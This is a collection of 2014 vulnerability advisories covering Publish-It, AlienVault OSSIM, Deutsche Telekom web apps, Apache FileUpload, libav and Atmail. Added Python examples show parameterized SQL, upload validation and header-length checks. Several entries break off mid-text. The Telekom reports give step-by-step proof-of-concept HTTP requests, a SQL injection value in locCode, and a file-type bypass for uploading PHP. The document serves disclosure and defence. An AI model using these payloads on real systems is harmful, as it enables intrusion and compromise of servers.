CORE-2014-0001 - Publish-It Buffer Overflow Vulnerability
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Publish-It Buffer Overflow Vulnerability

1. *Advisory Information*

Title: Publish-It Buffer Overflow Vulnerability
Advisory ID: CORE-2014-0001
Advisory URL: http://www.coresecurity.com/advisories/publish-it-buffer-overflow-vulnerability
Date published: 2014-02-05
Date of last update: 2014-02-05
Vendors contacted: Poster Software
Release mode: User release

2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-0980

3. *Vulnerability Description*

Publish-It [1] is prone to a (client side) security vulnerability when processing .PUI files. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine, by enticing the user of Publish-It to open a specially crafted .PUI file.

4. *Vulnerable Packages*

. Publish-It v3.6d for Win XP.
. Publish-It v3.6d for Win 7.
. Other versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

There was no official answer from the vendor after several attempts to report this vulnerability (see [Sec. 8]). As a mitigation, given that this is a client-side vulnerability, avoid opening untrusted .PUI files. Contact the vendor for further information.

6. *Credits*

This vulnerability was discovered and researched by Daniel Kazimirow from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

Below is the result of opening the Proof of Concept file [2] on Windows XP SP3 (EN):

/-
EAX 04040404
ECX 0325
EDX FF99
EBX 77F15B70 GDI32.SelectObject
ESP 0012F5D4
EBP 77F161C1 GDI32.GetStockObject
ESI 0103A1E8
EDI A50107D3
EIP 04040404
C 0  ES 0023 32bit 0()
P 0  CS 001B 32bit 0()
A 1  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 0212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? 0001 00010002
ST1 empty -??? 0043 004F007A
ST2 empty -??? 7590A3E7 FDBDC8F2
ST3 empty -??? 0043 0050007B
ST4 empty 1.000
ST5 empty -9.2233720368547758080e+18
-/

The arbitrary value 0x04040404 is stored in the EIP register, where our shellcode starts (just a software breakpoint, 0xCC):

/-
04040404  CC  INT3
04040405  CC  INT3
04040406  CC  INT3
04040407  CC  INT3
04040408  CC  INT3
04040409  CC  INT3
0404040A  CC  INT3
0404040B  CC  INT3
...
-/

As a result, the normal execution flow can be altered in order to execute arbitrary code.

8. *Report Timeline*

. 2013-12-20: Core Security Technologies attempts to contact vendor. Publication date is set for Jan 21st, 2014.
. 2014-01-06: Core attempts to contact vendor.
. 2014-01-15: Core asks for confirmation of the initial contact e-mail.
. 2014-01-15: Vendor sends an e-mail with a single word: "Confirmed".
. 2014-01-16: Core sends a technical description and asks for an estimated release date. No reply received.
. 2014-01-21: First release date missed.
. 2014-01-27: Core attempts to contact vendor. No reply received.
. 2014-02-05: After one month and a half trying to contact the vendor, the only reply from them was the word "Confirmed", and the advisory CORE-2014-0001 is published as 'User release'.

9. *References*

[1] http://www.postersw.com/
[2] http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip

10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies.

CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and En
AlienVault OSSIM SQL Injection vulnerability
INDEX
---
1. Background
2. Description
3. Affected Products
4. Vulnerability
5. Solution
6. Credit
7. Disclosure Timeline

1. BACKGROUND
---
OSSIM by AlienVault is an Open Source Security Information and Event Management (SIEM) platform, comprising a collection of tools designed to aid network administrators in computer security, intrusion detection and prevention. (Wikipedia)

2. DESCRIPTION
---
A vulnerability has been discovered in OSSIM's OCS Inventory web interface due to insufficient input validation before inserting untrusted, user-supplied data into a SQL query.

3. AFFECTED PRODUCTS
---
AlienVault OSSIM 4.3

4. VULNERABILITIES
---
4.1 /ocsreports/tele_stats.php
4.11 The associated query was confirmed to be running with 'root' user privileges.

5. SOLUTION
---
The vendor was contacted and confirmed that the vulnerable application was removed in recent versions. Upgrade to the latest version.
http://forums.alienvault.com/discussion/1873/security-advisory-all-alienvault-versions-prior-to-v4-3-3-1

6. CREDIT
---
This vulnerability was discovered by Andrew Smith.

7. DISCLOSURE TIMELINE
---
1-18-2014 - Vulnerability Discovered
1-27-2014 - Vendor Informed
2-3-2014 - Public Disclosure
German Telekom Bug Bounty #11 - Remote SQL Injection Vulnerability
Document Title:
===
German Telekom Bug Bounty #11 - SQL Injection Vulnerability

References (Source):
===
http://www.vulnerability-lab.com/get_content.php?id=1177

Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml

Release Date:
===
2014-02-06

Vulnerability Laboratory ID (VL-ID):
===
1177

Common Vulnerability Scoring System:
===
8.3

Product & Service Introduction:
===
Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty )

Abstract Advisory Information:
===
The Vulnerability Laboratory Research Team discovered a remote SQL Injection web vulnerability in the official Telekom website web-application.

Vulnerability Disclosure Timeline:
===
2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-12-30: Vendor Notification (Telekom CERT Security Team)
2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team)
2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€)
2014-02-06: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Exploitation Technique:
===
Remote

Severity Level:
===
Critical

Technical Details & Description:
===
A remote SQL Injection web vulnerability has been discovered in the official Telekom (English) Fitness Check website web application. The vulnerability allows remote attackers to inject their own unauthorized SQL statements to compromise the affected web-application or DBMS.

The SQL injection vulnerability is located in the `englishtest2004/test.asp` file of the englishtest2004 module (path). After executing the query through the test.asp page, the query's result can be seen in a `500 error` returned by the `test.asp` page. The connected vulnerable parameter in the `test.aspx` file is `mailbody`, which is passed through the POST method request. The SQL injection bug is in the INSERT statement. Other parameters like VORNAME, Email, PLZ, TELEFON can be accessed by usage of a malicious INSERT statement.

The security risk of the SQL injection vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 8.3(+).

Exploitation of the remote SQL injection web vulnerability requires no user interaction and no privileged web-application user account. Successful exploitation of the remote pre-auth SQL injection results in DBMS, web-server and web-application (context) compromise.

Vulnerable Module(s):
[+] /englishtest2004/

Vulnerable File(s):
[+] /englishtest2004/test.asp

Vulnerable Parameter(s):
[+] mailbody

Proof of Concept (PoC):
===
The SQL injection vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For demonstration or to reproduce ...

a) The attacker should visit the main page to take the test: https://gt.telekom.de/englishtest2004eng/html/intro.htm
b) The attacker should keep clicking on next until he reaches the final step in the test, which is the page "Registration for the Fitness Check"
c) In the form of registering the test, we have many fields. We fill up the vulnerable fields and then click on the "Register" button
d) The attacker then should intercept the request and edit the "mailbody" parameter to an apostrophe that will generate the SQL error
e) After forwarding the request, we will find the SQL error in the INSERT statement echoed back in the page

The POST request that has been used to reproduce the image is:

POST /englishtest2004/test.asp HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection: keep-alive
Content-Type: application/x-www-form-urlencode
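The defect the advisory describes is an INSERT built by splicing the form fields into the SQL text, which is why a lone apostrophe in mailbody surfaces as a database error. The following Python is an added example, not Telekom's code: it stands in an in-memory SQLite table for the registration table (the table name, the field set VORNAME, Email, PLZ, TELEFON, mailbody taken from the advisory, the function names and the sample form are this example's own) and shows the spliced INSERT failing on the apostrophe beside the parameterized INSERT storing it verbatim.

```python
import sqlite3

# Field names come from the advisory; the table layout is assumed for the example.
FIELDS = ("VORNAME", "Email", "PLZ", "TELEFON", "mailbody")


def _fresh_db():
    """In-memory stand-in for the registration table (constructed for the example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE registration (VORNAME TEXT, Email TEXT, PLZ TEXT, TELEFON TEXT, mailbody TEXT)"
    )
    return conn


def insert_concatenated(conn, form):
    """The vulnerable pattern: field values spliced straight into the INSERT text."""
    values = ", ".join("'" + form[f] + "'" for f in FIELDS)
    sql = f"INSERT INTO registration ({', '.join(FIELDS)}) VALUES ({values})"
    conn.execute(sql)  # a single apostrophe in mailbody ends the quoted literal early
    conn.commit()


def insert_parameterized(conn, form):
    """The fix: placeholders carry the values, so input never becomes SQL syntax."""
    placeholders = ", ".join("?" for _ in FIELDS)
    sql = f"INSERT INTO registration ({', '.join(FIELDS)}) VALUES ({placeholders})"
    conn.execute(sql, tuple(form[f] for f in FIELDS))
    conn.commit()


def register(form, safe):
    """Run one registration against a fresh table.

    Returns ("ok", stored_mailbody) on success or ("error", message) when the
    database rejects the statement, mirroring the 500 error the page reports.
    """
    conn = _fresh_db()
    try:
        (insert_parameterized if safe else insert_concatenated)(conn, form)
    except sqlite3.Error as exc:
        return "error", str(exc)
    row = conn.execute("SELECT mailbody FROM registration").fetchone()
    return "ok", row[0]


# Constructed sample submission: mailbody is the lone apostrophe from the PoC step d).
SAMPLE_FORM = {
    "VORNAME": "Test",
    "Email": "test@example.com",
    "PLZ": "53113",
    "TELEFON": "000",
    "mailbody": "'",
}

if __name__ == "__main__":
    print("concatenated:", register(SAMPLE_FORM, safe=False))
    print("parameterized:", register(SAMPLE_FORM, safe=True))
```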
German Telekom Bug Bounty #10 - Arbitrary File Upload Vulnerability
Document Title:
===
German Telekom Bug Bounty #10 - Arbitrary File Upload Vulnerability

References (Source):
===
http://www.vulnerability-lab.com/get_content.php?id=1176

Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml

Release Date:
===
2014-02-04

Vulnerability Laboratory ID (VL-ID):
===
1176

Common Vulnerability Scoring System:
===
7.2

Product & Service Introduction:
===
Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty )

Abstract Advisory Information:
===
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in an official German Telekom website web-application.

Vulnerability Disclosure Timeline:
===
2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-12-30: Vendor Notification (Telekom CERT Security Team)
2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team)
2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€)
2014-02-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Affected Product(s):
===
Deutsche Telekom (German Telecom)
Product: Profil Bild Online Service - Web Application 2014 Q1

Exploitation Technique:
===
Remote

Severity Level:
===
High

Technical Details & Description:
===
An arbitrary file upload web vulnerability has been discovered in the official German Telecom Profile Picture tool website web application. The web vulnerability allows remote attackers to upload an arbitrary (malicious) file to compromise the DBMS, website or web-server system.

The arbitrary file upload vulnerability is located in the `/scripts/php/process.php` file. After executing the query through the process.php page, the query result can be seen from `/scripts/php/downloadImage.php`. Remote attackers are able to manipulate the POST method request of the process.php file to upload their own unauthorized malicious files.

Exploitation of the remote web vulnerability requires no user interaction and no privileged web application user account. Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website or DBMS compromise.

Vulnerable Module(s):
[+] profilbildtool

Vulnerable File(s):
[+] /scripts/php/process.php

Proof of Concept (PoC):
===
The arbitrary file upload vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.

a) The attacker should visit the main page http://profilbildtool.telekom.de/imagecropper.php?lang=en to create an image using the system
b) In the "Choose network" section, Twitter can be chosen as our network
c) In "Type of activity":
   1) The "Official use" radio button should be used
   2) "Lead accounts" from the dropdown menu
   3) The country chosen should be "Austria AT"
   4) In "Select Logo", "T-Systems" should be used
d) "Types of background":
   1) Choose "Picture" for background
   2) Browse and choose a specially crafted php or exe file. For example, we will use test.php
   3) Press upload

At this point we should intercept the request and change Content-Type: text/php to Content-Type: image/jpeg. This will help us to bypass the type checking on the server side. The other constraint is the size of the file. We can change this by generating a specially crafted php file where the php code is in the EXIF section of the file. By this, the file will run as php correctly once its extension is php.

Our request will be similar to this ...

POST /scripts/php/process.php HTTP/1.1
Host: profilbildtool.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://profil
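The bypass above works because the server decides from the client-supplied Content-Type header and keeps the extension it is given. The following Python function is an added example, not Telekom's code, of the server-side check a defender would put behind such an upload: the client's Content-Type plays no part, the extension must come from an allowlist, the leading bytes must match that extension, and the stored name is chosen by the server. The function names, the size limit and the sample uploads are this example's own.

```python
import os
import secrets

# Server-side allowlist: extension -> magic-byte prefixes the content must start with.
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # hypothetical limit chosen for the example


def validate_upload(filename: str, client_content_type: str, data: bytes):
    """Return (ok, stored_name_or_reason) for an uploaded background picture.

    client_content_type is a parameter only to make the point that it is never
    consulted: relabelling a script as image/jpeg changes nothing below.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "too large"
    # Drop any directory part the client sent, then look only at the name.
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    # Exactly one extension, and it must be on the allowlist; this rejects
    # test.php as well as double extensions such as test.php.jpg.
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_IMAGE_TYPES:
        return False, "extension not allowed"
    ext = parts[1]
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGE_TYPES[ext]):
        return False, "content does not match extension"
    # A magic-byte check still accepts a genuine JPEG that carries script text
    # in its EXIF segment, so the stored name never comes from the client: it
    # is random and keeps only the validated image extension. Serving the
    # upload directory with script execution disabled, or re-encoding the
    # image so metadata is dropped, closes that remaining gap.
    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads (not real files): a JPEG header, a PHP stub
# relabelled as image/jpeg, a double-extension attempt, and a mismatched type.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
SAMPLE_UPLOADS = [
    ("photo.jpg", "image/jpeg", JPEG_STUB),
    ("test.php", "image/jpeg", b"<?php echo 'x'; ?>"),
    ("test.php.jpg", "image/jpeg", JPEG_STUB),
    ("logo.png", "image/png", JPEG_STUB),
]


def screen_samples():
    """Apply validate_upload to SAMPLE_UPLOADS and return the verdicts in order."""
    return [validate_upload(*sample) for sample in SAMPLE_UPLOADS]


if __name__ == "__main__":
    for (name, ctype, _), (ok, detail) in zip(SAMPLE_UPLOADS, screen_samples()):
        verdict = "stored as " + detail if ok else "rejected: " + detail
        print(f"{name:14} {ctype:12} -> {verdict}")
```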
CVE-2014-1214 - Remote Code Execution in Projoom NovaSFH Plugin
Vulnerability title: Remote Code Execution in Projoom NovaSFH Plugin
CVE: CVE-2014-1214
Vendor: Projoom
Product: NovaSFH Plugin
Version: 3.0.3
Reported by: Yuri Kramarz

Details:
The PHP executable which is responsible for handling file upload functionality allows arbitrary files to be uploaded to any directory specified by the attackers, as the file upload function does not verify file type or origin when processing the request.

Further details at:
http://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1214/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
German Telekom Bug Bounty #9 - Code Execution Vulnerability
Document Title:
===
German Telekom Bug Bounty #9 - Code Execution Vulnerability

References (Source):
===
http://www.vulnerability-lab.com/get_content.php?id=1174

Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml

Release Date:
===
2014-02-05

Vulnerability Laboratory ID (VL-ID):
===
1174

Common Vulnerability Scoring System:
===
9.4

Product & Service Introduction:
===
Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom & http://www.telekom.com/bug-bounty )

Abstract Advisory Information:
===
The Vulnerability Laboratory Research Team discovered a remote code execution vulnerability in the official German Telekom online-service web-application.

Vulnerability Disclosure Timeline:
===
2013-12-30: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-12-30: Vendor Notification (Telekom CERT Security Team)
2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team)
2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€)
2014-02-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
===
Published

Affected Product(s):
===
Deutsche Telekom (German Telecom)
Product: Profil Bild Online Service - Web Application 2013 Q4

Exploitation Technique:
===
Remote

Severity Level:
===
Critical

Technical Details & Description:
===
A Remote Code Execution vulnerability has been discovered in the official Telekom online-service web-application. The remote vulnerability allows attackers to inject unauthorized system commands to compromise the affected machine.

The Remote Code Execution vulnerability is located in the `downloadImage.php` and `process.php` files. The vulnerable parameter is `locCode`. Remote attackers can manipulate the POST method request with the ImgType values to inject/execute their own PHP commands. Exploitation of the issue requires neither a low privileged web-application user account nor user interaction. Successful exploitation of the vulnerability results in system & web-application (service) compromise.

Vulnerable Module(s):
[+] telekom.de (profilbildtool)

Vulnerable File(s):
[+] downloadImage.php
[+] process.php

Vulnerable Parameter(s):
[+] locCode > AT

Proof of Concept (PoC):
===
The remote code execution vulnerability can be exploited by remote attackers without user interaction or privileged user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

Send this request first ...

POST /scripts/php/process.php HTTP/1.1
Host: profilbildtool.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://profilbildtool.telekom.de/imagecropper.php?lang=en
Content-Length: 96
Cookie: PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=rd10oac1c0a0eo8080
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

imgType=twitter&usage=official&branch=tmobile&color=magenta&txtSize=small&locCode=AT'+and+'a'='a

Get the image with this request ...

GET /scripts/php/downloadImage.php HTTP/1.1
Host: profilbildtool.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://profilbildtool.telekom.de/imagecropper.php?lang=en
Cookie: PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=1
Connection: keep-alive

Because ... locCode=AT'+and+'a'='a is TRUE, you will see that the image has "AT" in the top left corner.

Repeat with these two requests ...

//Generate
[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS
CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Commons FileUpload 1.0 to 1.3
- Apache Tomcat 8.0.0-RC1 to 8.0.1
- Apache Tomcat 7.0.0 to 7.0.50
- Apache Tomcat 6 and earlier are not affected

Apache Tomcat 7 and Apache Tomcat 8 use a package-renamed copy of Apache Commons FileUpload to implement the requirement of the Servlet 3.0 and later specifications to support the processing of mime-multipart requests. Tomcat 7 and 8 are therefore affected by this issue. While Tomcat 6 uses Commons FileUpload as part of the Manager application, access to that functionality is limited to authenticated administrators.

Description:
It is possible to craft a malformed Content-Type header for a multipart request that causes Apache Commons FileUpload to enter an infinite loop. A malicious user could, therefore, craft a malformed request that triggered a denial of service.

This issue was reported responsibly to the Apache Software Foundation via JPCERT but an error in addressing an e-mail led to the unintended early disclosure of this issue [1].

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to Apache Commons FileUpload 1.3.1 or later once released
- Upgrade to Apache Tomcat 8.0.2 or later once released
- Upgrade to Apache Tomcat 7.0.51 or later once released
- Apply the appropriate patch
  - Commons FileUpload: http://svn.apache.org/r1565143
  - Tomcat 8: http://svn.apache.org/r1565163
  - Tomcat 7: http://svn.apache.org/r1565169
- Limit the size of the Content-Type header to less than 4091 bytes

Credit:
This issue was reported to the Apache Software Foundation via JPCERT.
References:
[1] http://markmail.org/message/kpfl7ax4el2owb3o
[2] http://tomcat.apache.org/security-8.html
[3] http://tomcat.apache.org/security-7.html
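The last mitigation listed, capping the Content-Type header at 4091 bytes, can be enforced in front of the parser while the upgrade is pending. The following Python function is an added example, not Apache or Tomcat code: it applies that cap and, for multipart requests, the RFC 2046 limits on the boundary parameter (1 to 70 characters from a fixed set, no trailing space). The function and constant names and the sample headers are this example's own.

```python
import re

# Threshold from the advisory's mitigation: headers of 4091 bytes or more are rejected.
MAX_CONTENT_TYPE_LEN = 4091

# RFC 2046 section 5.1.1: a boundary is 1 to 70 characters drawn from this set
# and must not end with a space.
_BOUNDARY_RE = re.compile(r"^[0-9A-Za-z'()+_,\-./:=? ]{1,70}$")


def parse_content_type(header: str):
    """Split 'type/subtype; k=v; k2="v2"' into (media_type, {param: value})."""
    parts = [p.strip() for p in header.split(";")]
    media_type = parts[0].lower()
    params = {}
    for part in parts[1:]:
        if "=" not in part:
            continue  # malformed parameter; ignored here, the byte cap still applies
        key, value = part.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        params[key.strip().lower()] = value
    return media_type, params


def check_multipart_content_type(header: str):
    """Return (ok, reason); ok=True means the header may be handed to the multipart parser."""
    # Apply the byte cap first, before any parsing touches an oversized header.
    if len(header.encode("latin-1", "replace")) >= MAX_CONTENT_TYPE_LEN:
        return False, "content-type header too long"
    media_type, params = parse_content_type(header)
    if not media_type.startswith("multipart/"):
        return True, "not multipart"
    boundary = params.get("boundary")
    if boundary is None:
        return False, "multipart without boundary"
    if boundary.endswith(" ") or not _BOUNDARY_RE.match(boundary):
        return False, "boundary violates RFC 2046 limits"
    return True, "ok"


# Constructed sample headers (not captured traffic): a browser-style header, one
# whose boundary pushes the header far past the cap, a multipart header with no
# boundary at all, and a non-multipart header that passes straight through.
SAMPLE_HEADERS = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "multipart/form-data; boundary=" + "a" * 5000,
    "multipart/form-data",
    "application/x-www-form-urlencoded",
]


def screen_samples():
    """Run the check over SAMPLE_HEADERS and return the verdicts in order."""
    return [check_multipart_content_type(h) for h in SAMPLE_HEADERS]


if __name__ == "__main__":
    for header, (ok, reason) in zip(SAMPLE_HEADERS, screen_samples()):
        print(f"{'ACCEPT' if ok else 'REJECT':6} {reason:35} {header[:60]}")
```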
[SECURITY] [DSA 2855-1] libav security update
Debian Security Advisory DSA-2855-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
February 05, 2014                       http://www.debian.org/security/faq

Package        : libav
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2011-3944 CVE-2013-0845 CVE-2013-0846 CVE-2013-0849 CVE-2013-0865 CVE-2013-7010 CVE-2013-7014 CVE-2013-7015

Several security issues have been corrected in multiple demuxers and decoders of the libav multimedia library. The IDs mentioned above are just a portion of the security issues fixed in this update. A full list of the changes is available at
http://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v0.8.10

For the stable distribution (wheezy), these problems have been fixed in version 6:0.8.9-1.

For the unstable distribution (sid), these problems have been fixed in version 6:9.11-1.

We recommend that you upgrade your libav packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[ISecAuditors Security Advisories] Multiple reflected XSS vulnerabilities in Atmail WebMail
=
INTERNET SECURITY AUDITORS ALERT 2013-014
- Original release date: March 25th, 2013
- Last revised: March 25th, 2013
- Discovered by: Vicente Aguilera Diaz
- Severity: 4.3/10 (CVSSv2 Base Scored)
- CVE-ID: CVE-2013-6229
=

I. VULNERABILITY
-
Multiple reflected XSS vulnerabilities in Atmail WebMail.

II. BACKGROUND
-
Atmail allows users to access IMAP mailboxes on any server of their choice. The software provides a comprehensive email suite for accessing user mailboxes, and provides inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

III. DESCRIPTION
-
Multiple reflected XSS vulnerabilities have been detected:
1) in the view attachment message process
2) in the search message with filter process
3) in the delete message process

These vulnerabilities allow arbitrary HTML/script code to be executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT
-
1) View attachment message process

When a user opens a file attachment in an email, the link is as follows:

http:///index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId//filenameOriginal/

where:
- is the Atmail WebMail server
- is the unique ID for the message that contains the attachment
- is the attachment file in the message

A malicious user can inject arbitrary HTML/script code in the parameter. For example:

http:///index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId//filenameOriginal/test.txtThis+is+an+XSS+example

2) Search message with filter process

When a user searches messages with a filter (for example, using the "Friends" filter), the link is as follows:

POST /index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5 HTTP/1.1
Host: ...

searchQuery=&goBack=6&from=&to=&subject=&body=&filter=

where:
- is the Atmail WebMail server
- is the name of the filter selected by the user

A malicious user can inject arbitrary HTML/script code in the parameter. Also, this POST HTTP request can become a GET HTTP request, making it easier to exploit the vulnerability. For example:

http:///index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friendsThis+is+an+XSS+example

3) Delete message process

When a user selects and deletes a message, the link is as follows:

POST /index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash HTTP/1.1
Host: ...

resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

where:
- is the Atmail WebMail server
- is the identifier (number) of the mail selected by the user

A malicious user can inject arbitrary HTML/script code in the parameter. Also, this POST HTTP request can become a GET HTTP request, making it easier to exploit the vulnerability. For example:

